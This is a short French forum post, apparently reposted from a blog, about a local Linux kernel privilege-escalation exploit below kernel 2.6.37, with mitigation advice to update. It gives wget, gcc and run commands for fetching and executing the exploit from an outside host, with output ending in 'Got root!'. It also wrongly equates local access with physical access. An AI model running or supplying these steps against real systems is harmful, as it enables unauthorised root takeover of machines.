Annonce

Réduire
Aucune annonce.

Avoir l’accès root sur Linux

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Avoir l’accès root sur Linux


    Voici la toute dernière faille de sécurité Linux, Un script écrit en C par Nelson Elhage, une fois exécuté, peut s’approprier les droits root sur la machine. L’exploit est local (bien heureusement), c’est à dire qu’il faut un accès phisique à la machine.

    Exploitation

    Il suffit de télécharger le script en C, le compiler, puis le lancer !

    Code:
    $ wget www.geeknoise.com/scripts/nelson.c
    $ gcc -o nelson nelson.c
    $ ./nelson[*] Resolving kernel addresses...
    [+] Resolved econet_ioctl to 0xf80f02a0
    [+] Resolved econet_ops to 0xf80f03a0
    [+] Resolved commit_creds to 0xc016c830
    [+] Resolved prepare_kernel_cred to 0xc016cc80[*] Calculating target...[*] Triggering payload...[*] Got root!
    #
    Ça marche vraiment ce truc ?

    Eh bien, constatez par vous même :



    Comment s’en protéger ?

    Cet exploit concerne les versions inférieures à 2.6.37 du kernel. Une simple mise à jour corrigera donc le problème.

    Slackware, debian, et redhat ne sont pas concernées par cet exploit, et Ubuntu 10.10 non plus, je vous rassure

    Source:geeknoise
    sigpic
Chargement...
X